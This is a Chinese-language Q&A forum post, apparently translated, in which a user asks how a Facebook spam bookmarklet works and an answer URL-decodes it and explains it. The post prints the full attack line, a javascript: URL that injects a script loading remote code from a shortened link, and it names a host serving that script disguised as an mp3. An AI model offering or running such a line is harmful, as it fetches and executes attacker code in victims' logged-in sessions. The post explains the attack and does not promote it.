因此,我刚刚在Facebook上看到了用JavaScript编写的垃圾邮件代码,我想知道是否有人可以向我解释该代码的工作原理并与Facebook进行交互。我无意将其用于恶意目的,但我只是对Facebook等网站的安全性感兴趣。这是从地址栏执行的代码(我建议您不要自己尝试,您可能会遇到一些烦恼的朋友)。

javascript:    (a%3D(b%3Ddocument).createElement('script')).src%3D'http%3A%2F%2Fbit.ly%2FFB1337%20%20%3F'%2BM  ath.random()%2Cb.body.appendChild(a)%3Bvoid(0)

最佳答案

在此处检查链接是否为url编码:

http://meyerweb.com/eric/tools/dencoder/

javascript:

a=(b=document).createElement('script')).src='http://bit.ly/FB1337?'+Math.random(),b.body.appendChild(a);void(0)


从我所看到的:将该URL加载为脚本并将其添加到当前页面。

编辑:
加载的脚本位于以下URL:http://www.raxarstudios.com/x/audiotrack2.mp3

它被伪装成mp3歌曲,但只是javascript:http://pastebin.com/RVmNVtt9
我快速浏览了一下,它显然使用了一些沉重的ajax来添加事件并将它们自己加入其中。

09-17 15:28
查看更多